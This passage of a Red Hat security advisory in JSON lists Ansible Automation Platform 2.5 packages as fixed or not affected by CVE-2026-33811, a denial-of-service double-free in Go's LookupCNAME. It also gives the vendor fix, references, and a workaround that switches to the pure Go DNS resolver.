"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2467822"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the `net` package of Go (golang), specifically when using the `LookupCNAME` function with the `cgo` DNS resolver. A remote attacker could exploit this by providing a very long Canonical Name (CNAME) response. This can trigger a double-free of C memory, leading to a crash and a Denial of Service (DoS) for the affected application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net: golang: Go net package: Denial of Service via long CNAME response in LookupCNAME",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in the Go `net` package, affecting applications configured to use the `cgo` DNS resolver. A remote attacker could trigger a double-free memory error by providing a very long CNAME response, leading to a crash of the vulnerable application and impacting service availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33811"
},
{
"category": "external",
"summary": "RHBZ#2467822",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467822"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33811",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33811"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811"
},
{
"category": "external",
"summary": "https://go.dev/cl/767860",
"url": "https://go.dev/cl/767860"
},
{
"category": "external",
"summary": "https://go.dev/issue/78803",
"url": "https://go.dev/issue/78803"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M",
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4981",
"url": "https://pkg.go.dev/vuln/GO-2026-4981"
}
],
"release_date": "2026-05-07T19:41:19.285000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
},
{
"category": "workaround",
"details": "To mitigate this issue, applications can be configured to use the pure Go DNS resolver instead of the `cgo` DNS resolver. This can be achieved by setting the `GODEBUG` environment variable to `netdns=go`. For example, to run a Go application with this mitigation: `GODEBUG=netdns=go /path/to/your/go/application`. This change may require restarting affected applications or services to take effect. Users should verify that this change does not negatively impact DNS resolution for their specific application environment.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
